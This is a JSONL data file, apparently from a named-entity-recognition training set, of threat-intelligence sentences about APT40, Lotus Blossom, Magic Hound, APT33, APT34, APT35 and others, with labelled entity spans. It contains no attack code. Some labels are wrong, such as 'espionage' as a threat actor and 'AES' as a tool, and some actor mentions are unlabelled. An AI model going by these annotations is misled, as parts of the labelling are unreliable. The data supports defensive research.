{"text": "The Leviathan group has specifically targeted engineering , transportation , and the defense industry , especially where these sectors overlap with maritime technologies .", "spans": {"THREAT_ACTOR: Leviathan group": [[4, 19]]}, "info": {"id": "dnrti_train_000728", "source": "dnrti_train"}}
{"text": "We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy .", "spans": {"THREAT_ACTOR: APT40": [[11, 16]]}, "info": {"id": "dnrti_train_000729", "source": "dnrti_train"}}
{"text": "Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research .", "spans": {"THREAT_ACTOR: APT40": [[14, 19]]}, "info": {"id": "dnrti_train_000730", "source": "dnrti_train"}}
{"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]]}, "info": {"id": "dnrti_train_000731", "source": "dnrti_train"}}
{"text": "We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation .", "spans": {"THREAT_ACTOR: APT40": [[40, 45]]}, "info": {"id": "dnrti_train_000732", "source": "dnrti_train"}}
{"text": "The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China .", "spans": {"THREAT_ACTOR: actor": [[4, 9], [124, 129]]}, "info": {"id": "dnrti_train_000733", "source": "dnrti_train"}}
{"text": "Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard Time ( UTC +8 ) .", "spans": {"THREAT_ACTOR: group": [[41, 46]]}, "info": {"id": "dnrti_train_000734", "source": "dnrti_train"}}
{"text": "APT40 relies heavily on web shells for an initial foothold into an organization .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "TOOL: web shells": [[24, 34]]}, "info": {"id": "dnrti_train_000735", "source": "dnrti_train"}}
{"text": "APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]]}, "info": {"id": "dnrti_train_000736", "source": "dnrti_train"}}
{"text": "Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement .", "spans": {}, "info": {"id": "dnrti_train_000737", "source": "dnrti_train"}}
{"text": "The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: CVE-2012-0158": [[59, 72]]}, "info": {"id": "dnrti_train_000738", "source": "dnrti_train"}}
{"text": "A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\… \" .", "spans": {"ORGANIZATION: Palo Alto Networks": [[44, 62]], "TOOL: Elise": [[213, 218]]}, "info": {"id": "dnrti_train_000739", "source": "dnrti_train"}}
{"text": "The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: PDF exploits": [[41, 53]], "VULNERABILITY: Adobe Flash Player exploits": [[56, 83]], "VULNERABILITY: CVE-2012-0158": [[101, 114]], "VULNERABILITY: Word exploits": [[115, 128]], "TOOL: Tran Duy Linh": [[175, 188]]}, "info": {"id": "dnrti_train_000741", "source": "dnrti_train"}}
{"text": "The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years .", "spans": {"THREAT_ACTOR: Spring Dragon": [[4, 17]], "ORGANIZATION: government-related organizations": [[78, 110]]}, "info": {"id": "dnrti_train_000742", "source": "dnrti_train"}}
{"text": "Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned .", "spans": {"THREAT_ACTOR: Spring Dragon": [[49, 62]]}, "info": {"id": "dnrti_train_000743", "source": "dnrti_train"}}
{"text": "Spring Dragon 's infiltration techniques there were not simply spearphish .", "spans": {"THREAT_ACTOR: Spring Dragon": [[0, 13]]}, "info": {"id": "dnrti_train_000744", "source": "dnrti_train"}}
{"text": "The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": {"MALWARE: Zawgyi_Keyboard_L.zip": [[24, 45]], "MALWARE: setup.exe": [[69, 78]], "TOOL: Elise": [[139, 144]], "MALWARE: wincex.dll": [[147, 157]]}, "info": {"id": "dnrti_train_000745", "source": "dnrti_train"}}
{"text": "While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "THREAT_ACTOR: Spring Dragon": [[104, 117]]}, "info": {"id": "dnrti_train_000746", "source": "dnrti_train"}}
{"text": "The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes .", "spans": {"THREAT_ACTOR: threat group": [[15, 27]], "THREAT_ACTOR: DRAGONFISH": [[35, 45]], "THREAT_ACTOR: Lotus Blossom": [[49, 62]], "TOOL: Elise malware": [[94, 107]], "THREAT_ACTOR: espionage": [[136, 145]]}, "info": {"id": "dnrti_train_000747", "source": "dnrti_train"}}
{"text": "The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]], "THREAT_ACTOR: DRAGONFISH": [[34, 44]]}, "info": {"id": "dnrti_train_000748", "source": "dnrti_train"}}
{"text": "iDefense analysts have identified a campaign likely to be targeting members of— or those with affiliation or interest in—the ASEAN Defence Ministers ' Meeting ( ADMM ) .", "spans": {"ORGANIZATION: iDefense": [[0, 8]], "ORGANIZATION: Defence Ministers ' Meeting": [[131, 158]], "ORGANIZATION: ADMM": [[161, 165]]}, "info": {"id": "dnrti_train_000749", "source": "dnrti_train"}}
{"text": "iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) .", "spans": {"ORGANIZATION: iDefense": [[0, 8]], "ORGANIZATION: ASEAN Defence Minister 's Meeting": [[124, 157]], "ORGANIZATION: ADMM": [[160, 164]]}, "info": {"id": "dnrti_train_000750", "source": "dnrti_train"}}
{"text": "iDefense assesses with high confidence that this campaign is associated with the threat group DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) .", "spans": {"ORGANIZATION: iDefense": [[0, 8]], "THREAT_ACTOR: threat group": [[81, 93]], "THREAT_ACTOR: DRAGONFISH": [[94, 104]], "THREAT_ACTOR: Lotus Blossom": [[121, 134]], "THREAT_ACTOR: Spring Dragon": [[139, 152]]}, "info": {"id": "dnrti_train_000751", "source": "dnrti_train"}}
{"text": "To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": {"VULNERABILITY: CVE-2017-11882": [[239, 253]]}, "info": {"id": "dnrti_train_000752", "source": "dnrti_train"}}
{"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "VULNERABILITY: CVE-2014-6332": [[32, 45]], "TOOL: Emissary": [[144, 152]]}, "info": {"id": "dnrti_train_000753", "source": "dnrti_train"}}
{"text": "The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: individual": [[22, 32]], "THREAT_ACTOR: actors": [[46, 52]]}, "info": {"id": "dnrti_train_000754", "source": "dnrti_train"}}
{"text": "Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "VULNERABILITY: CVE-2014-6332": [[35, 48]]}, "info": {"id": "dnrti_train_000758", "source": "dnrti_train"}}
{"text": "This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report .", "spans": {"TOOL: Elise backdoor": [[30, 44]]}, "info": {"id": "dnrti_train_000759", "source": "dnrti_train"}}
{"text": "Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "VULNERABILITY: CVE-2014-6332": [[40, 53]], "TOOL: Emissary Trojan": [[86, 101]]}, "info": {"id": "dnrti_train_000760", "source": "dnrti_train"}}
{"text": "APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"THREAT_ACTOR: APT threat actors": [[0, 17]], "ORGANIZATION: diplomat": [[68, 76]]}, "info": {"id": "dnrti_train_000761", "source": "dnrti_train"}}
{"text": "Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"ORGANIZATION: French diplomat": [[34, 49]], "THREAT_ACTOR: actors": [[115, 121]]}, "info": {"id": "dnrti_train_000762", "source": "dnrti_train"}}
{"text": "The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia .", "spans": {"TOOL: Elise malware": [[4, 17]], "THREAT_ACTOR: Lotus Blossom": [[26, 39]]}, "info": {"id": "dnrti_train_000763", "source": "dnrti_train"}}
{"text": "Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia .", "spans": {"ORGANIZATION: Unit 42": [[35, 42]], "THREAT_ACTOR: Lotus Blossom actors": [[61, 81]], "ORGANIZATION: government agencies": [[131, 150]]}, "info": {"id": "dnrti_train_000764", "source": "dnrti_train"}}
{"text": "In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": {"ORGANIZATION: Unit 42": [[19, 26]], "TOOL: Emissary Trojan": [[85, 100]]}, "info": {"id": "dnrti_train_000765", "source": "dnrti_train"}}
{"text": "The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years .", "spans": {}, "info": {"id": "dnrti_train_000766", "source": "dnrti_train"}}
{"text": "In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military .", "spans": {"TOOL: Emissary": [[14, 22]]}, "info": {"id": "dnrti_train_000767", "source": "dnrti_train"}}
{"text": "Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented .", "spans": {"TOOL: Elise sample": [[54, 66]], "THREAT_ACTOR: group": [[99, 104]]}, "info": {"id": "dnrti_train_000768", "source": "dnrti_train"}}
{"text": "In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware .", "spans": {"TOOL: legitimate domains": [[131, 149]]}, "info": {"id": "dnrti_train_000769", "source": "dnrti_train"}}
{"text": "All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong .", "spans": {"TOOL: Emissary": [[11, 19]]}, "info": {"id": "dnrti_train_000770", "source": "dnrti_train"}}
{"text": "One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan .", "spans": {"TOOL: Emissary": [[119, 127]], "TOOL: Emissary Trojan": [[259, 274]]}, "info": {"id": "dnrti_train_000771", "source": "dnrti_train"}}
{"text": "Lotus Blossom targeted the government , higher education , and high tech companies .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "ORGANIZATION: high tech companies": [[63, 82]]}, "info": {"id": "dnrti_train_000772", "source": "dnrti_train"}}
{"text": "Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years .", "spans": {"TOOL: Emissary": [[51, 59]], "THREAT_ACTOR: threat actors": [[99, 112]]}, "info": {"id": "dnrti_train_000773", "source": "dnrti_train"}}
{"text": "While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access .", "spans": {"THREAT_ACTOR: threat actors": [[119, 132]]}, "info": {"id": "dnrti_train_000774", "source": "dnrti_train"}}
{"text": "The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 .", "spans": {"TOOL: Emissary Trojan": [[40, 55]]}, "info": {"id": "dnrti_train_000775", "source": "dnrti_train"}}
{"text": "Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions .", "spans": {"TOOL: Emissary": [[84, 92]]}, "info": {"id": "dnrti_train_000776", "source": "dnrti_train"}}
{"text": "Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 .", "spans": {}, "info": {"id": "dnrti_train_000777", "source": "dnrti_train"}}
{"text": "While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary .", "spans": {"TOOL: Elise Trojan": [[163, 175]], "TOOL: Emissary": [[203, 211]]}, "info": {"id": "dnrti_train_000778", "source": "dnrti_train"}}
{"text": "The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[4, 17]], "ORGANIZATION: high tech companies": [[99, 118]]}, "info": {"id": "dnrti_train_000779", "source": "dnrti_train"}}
{"text": "The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success .", "spans": {"TOOL: Emissary": [[11, 19]]}, "info": {"id": "dnrti_train_000780", "source": "dnrti_train"}}
{"text": "The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia .", "spans": {"THREAT_ACTOR: Lotus Blossom actors": [[4, 24]], "TOOL: Emissary": [[31, 39]]}, "info": {"id": "dnrti_train_000781", "source": "dnrti_train"}}
{"text": "Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": {"ORGANIZATION: technology sectors": [[82, 100]]}, "info": {"id": "dnrti_train_000782", "source": "dnrti_train"}}
{"text": "Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks .", "spans": {"TOOL: Emissary": [[67, 75]], "THREAT_ACTOR: Lotus Blossom": [[199, 212]], "TOOL: Emissary Trojan": [[236, 251]]}, "info": {"id": "dnrti_train_000783", "source": "dnrti_train"}}
{"text": "Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters .", "spans": {"THREAT_ACTOR: group": [[119, 124]], "THREAT_ACTOR: Rocket Kitten": [[134, 147]], "THREAT_ACTOR: Operation Saffron Rose": [[156, 178]], "THREAT_ACTOR: Ajax Security Team": [[181, 199]], "THREAT_ACTOR: Operation Woolen-Goldfish": [[202, 227]]}, "info": {"id": "dnrti_train_000784", "source": "dnrti_train"}}
{"text": "In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware .", "spans": {"THREAT_ACTOR: actors": [[43, 49]]}, "info": {"id": "dnrti_train_000785", "source": "dnrti_train"}}
{"text": "It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[24, 37]]}, "info": {"id": "dnrti_train_000786", "source": "dnrti_train"}}
{"text": "We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound .", "spans": {"ORGANIZATION: technology sectors": [[92, 110]]}, "info": {"id": "dnrti_train_000787", "source": "dnrti_train"}}
{"text": "The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region .", "spans": {"TOOL: MPK bot": [[4, 11]], "THREAT_ACTOR: group": [[89, 94]], "THREAT_ACTOR: Rocket Kitten": [[104, 117]]}, "info": {"id": "dnrti_train_000789", "source": "dnrti_train"}}
{"text": "One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": {"TOOL: RAT": [[72, 75]], "TOOL: Pupy": [[85, 89]]}, "info": {"id": "dnrti_train_000790", "source": "dnrti_train"}}
{"text": "Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES .", "spans": {"TOOL: AES": [[124, 127]]}, "info": {"id": "dnrti_train_000792", "source": "dnrti_train"}}
{"text": "The loader 's main goal was to run a PowerShell command to execute shellcode .", "spans": {"TOOL: PowerShell command": [[37, 55]]}, "info": {"id": "dnrti_train_000793", "source": "dnrti_train"}}
{"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[54, 68]]}, "info": {"id": "dnrti_train_000794", "source": "dnrti_train"}}
{"text": "The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": {"TOOL: custom dropper": [[53, 67]], "MALWARE: MagicHound.DropIt": [[95, 112]]}, "info": {"id": "dnrti_train_000795", "source": "dnrti_train"}}
{"text": "We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host .", "spans": {"TOOL: DropIt": [[36, 42]]}, "info": {"id": "dnrti_train_000796", "source": "dnrti_train"}}
{"text": "We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on .", "spans": {"TOOL: IRC bot": [[23, 30]], "TOOL: MPK": [[38, 41]], "TOOL: Leash sample": [[85, 97]]}, "info": {"id": "dnrti_train_000797", "source": "dnrti_train"}}
{"text": "The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region .", "spans": {"THREAT_ACTOR: espionage": [[60, 69]]}, "info": {"id": "dnrti_train_000798", "source": "dnrti_train"}}
{"text": "Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia .", "spans": {"ORGANIZATION: technology sectors": [[47, 65]]}, "info": {"id": "dnrti_train_000799", "source": "dnrti_train"}}
{"text": "At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound .", "spans": {"TOOL: Retriever": [[18, 27]], "TOOL: .NET downloader": [[33, 48]]}, "info": {"id": "dnrti_train_000800", "source": "dnrti_train"}}
{"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": {"TOOL: DropIt sample": [[28, 41]], "MALWARE: %TEMP%\\flash_update.exe": [[179, 202]], "TOOL: Flash Player installer": [[227, 249]]}, "info": {"id": "dnrti_train_000801", "source": "dnrti_train"}}
{"text": "M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats .", "spans": {"ORGANIZATION: M-Trends": [[0, 8]]}, "info": {"id": "dnrti_train_000802", "source": "dnrti_train"}}
{"text": "FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: threat actors": [[28, 41]], "THREAT_ACTOR: attackers": [[90, 99]], "THREAT_ACTOR: APT": [[143, 146]]}, "info": {"id": "dnrti_train_000803", "source": "dnrti_train"}}
{"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]], "ORGANIZATION: foreign governments": [[131, 150]], "ORGANIZATION: journalists": [[153, 164]], "ORGANIZATION: dissidents": [[182, 192]]}, "info": {"id": "dnrti_train_000804", "source": "dnrti_train"}}
{"text": "Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], "ORGANIZATION: technology infrastructure corporations": [[68, 106]]}, "info": {"id": "dnrti_train_000806", "source": "dnrti_train"}}
{"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]]}, "info": {"id": "dnrti_train_000807", "source": "dnrti_train"}}
{"text": "FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32 actors": [[21, 33]]}, "info": {"id": "dnrti_train_000808", "source": "dnrti_train"}}
{"text": "APT32 poses a threat to companies doing business or preparing to invest in Vietnam .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]]}, "info": {"id": "dnrti_train_000809", "source": "dnrti_train"}}
{"text": "We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country .", "spans": {"THREAT_ACTOR: APT32": [[80, 85]]}, "info": {"id": "dnrti_train_000810", "source": "dnrti_train"}}
{"text": "DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor .", "spans": {"TOOL: DROPSHOT": [[0, 8]], "TOOL: malware": [[31, 38]]}, "info": {"id": "dnrti_train_000811", "source": "dnrti_train"}}
{"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabia .", "spans": {"THREAT_ACTOR: APT33": [[44, 49]]}, "info": {"id": "dnrti_train_000812", "source": "dnrti_train"}}
{"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets .", "spans": {"THREAT_ACTOR: APT33": [[44, 49]]}, "info": {"id": "dnrti_train_000814", "source": "dnrti_train"}}
{"text": "Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT .", "spans": {"THREAT_ACTOR: APT33": [[31, 36]], "TOOL: DROPSHOT": [[41, 49]], "TOOL: DROPSHOT samples": [[100, 116]], "TOOL: SHAPESHIFT": [[166, 176]]}, "info": {"id": "dnrti_train_000815", "source": "dnrti_train"}}
{"text": "The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files .", "spans": {"TOOL: SHAPESHIFT wiper": [[4, 20]]}, "info": {"id": "dnrti_train_000816", "source": "dnrti_train"}}
{"text": "Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations .", "spans": {"TOOL: SHAPESHIFT": [[8, 18]], "THREAT_ACTOR: APT33": [[32, 37]], "THREAT_ACTOR: threat group": [[132, 144]]}, "info": {"id": "dnrti_train_000817", "source": "dnrti_train"}}
{"text": "The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": {"MALWARE: HTA files": [[4, 13]]}, "info": {"id": "dnrti_train_000819", "source": "dnrti_train"}}
{"text": "Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran .", "spans": {"THREAT_ACTOR: threat group": [[33, 45]], "ORGANIZATION: FireEye": [[57, 64]], "THREAT_ACTOR: APT34": [[68, 73]]}, "info": {"id": "dnrti_train_000820", "source": "dnrti_train"}}
{"text": "The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]]}, "info": {"id": "dnrti_train_000822", "source": "dnrti_train"}}
{"text": "APT34 uses a mix of public and non-public tools .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]]}, "info": {"id": "dnrti_train_000823", "source": "dnrti_train"}}
{"text": "In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER , which includes a domain generation algorithm ( DGA ) for command and control .", "spans": {"ORGANIZATION: FireEye": [[15, 22]], "THREAT_ACTOR: APT34": [[32, 37]], "TOOL: POWRUNER PowerShell-based backdoor": [[93, 127]], "TOOL: BONDUPDATER": [[147, 158]]}, "info": {"id": "dnrti_train_000826", "source": "dnrti_train"}}
{"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"THREAT_ACTOR: APT34": [[19, 24]], "VULNERABILITY: Microsoft Office vulnerability": [[39, 69]], "VULNERABILITY: CVE-2017-11882": [[70, 84]], "TOOL: POWRUNER": [[95, 103]], "TOOL: BONDUPDATER": [[108, 119]], "ORGANIZATION: Microsoft": [[143, 152]]}, "info": {"id": "dnrti_train_000828", "source": "dnrti_train"}}
{"text": "FireEye has identified APT35 operations dating back to 2014 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT35": [[23, 28]]}, "info": {"id": "dnrti_train_000829", "source": "dnrti_train"}}
{"text": "APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "THREAT_ACTOR: Newscaster Team": [[26, 41]], "THREAT_ACTOR: threat group": [[49, 61]]}, "info": {"id": "dnrti_train_000830", "source": "dnrti_train"}}
{"text": "APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: telecommunications sectors": [[116, 142]]}, "info": {"id": "dnrti_train_000831", "source": "dnrti_train"}}
{"text": "APT35 has historically used unsophisticated tools like those listed below in Figure 3 .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "TOOL: unsophisticated tools": [[28, 49]]}, "info": {"id": "dnrti_train_000832", "source": "dnrti_train"}}
{"text": "APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: military": [[52, 60]], "ORGANIZATION: diplomatic": [[63, 73]], "ORGANIZATION: government personnel": [[78, 98]], "ORGANIZATION: defense industrial base": [[141, 164]], "ORGANIZATION: DIB": [[167, 170]], "ORGANIZATION: telecommunications sectors": [[215, 241]]}, "info": {"id": "dnrti_train_000833", "source": "dnrti_train"}}
{"text": "Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team .", "spans": {"THREAT_ACTOR: APT35": [[38, 43], [100, 105]], "ORGANIZATION: news organizations": [[66, 84]], "THREAT_ACTOR: Newscaster Team": [[131, 146]]}, "info": {"id": "dnrti_train_000834", "source": "dnrti_train"}}
{"text": "Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"THREAT_ACTOR: threat group": [[34, 46]], "ORGANIZATION: FireEye": [[52, 59]], "THREAT_ACTOR: APT33": [[70, 75]], "ORGANIZATION: petrochemical organizations": [[172, 199]]}, "info": {"id": "dnrti_train_000835", "source": "dnrti_train"}}
{"text": "Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"THREAT_ACTOR: threat group": [[34, 46]], "ORGANIZATION: FireEye": [[47, 54]], "THREAT_ACTOR: APT33": [[65, 70]], "ORGANIZATION: petrochemical organizations": [[167, 194]]}, "info": {"id": "dnrti_train_000836", "source": "dnrti_train"}}
{"text": "In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company .", "spans": {"ORGANIZATION: Mandiant": [[16, 24]], "THREAT_ACTOR: APT35": [[60, 65]], "ORGANIZATION: energy company": [[79, 93]]}, "info": {"id": "dnrti_train_000837", "source": "dnrti_train"}}
{"text": "The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "dnrti_train_000838", "source": "dnrti_train"}}
{"text": "APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "TOOL: custom backdoor": [[35, 50]]}, "info": {"id": "dnrti_train_000839", "source": "dnrti_train"}}
{"text": "They then proceeded to log directly into the VPN using the credentials of the compromised user .", "spans": {"TOOL: credentials of the compromised user": [[59, 94]]}, "info": {"id": "dnrti_train_000840", "source": "dnrti_train"}}
{"text": "The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure .", "spans": {"TOOL: PupyRAT backdoor": [[25, 41]], "THREAT_ACTOR: APT35": [[74, 79]]}, "info": {"id": "dnrti_train_000841", "source": "dnrti_train"}}
{"text": "Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance .", "spans": {"THREAT_ACTOR: APT35": [[28, 33]]}, "info": {"id": "dnrti_train_000842", "source": "dnrti_train"}}
{"text": "While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East .", "spans": {}, "info": {"id": "dnrti_train_000843", "source": "dnrti_train"}}
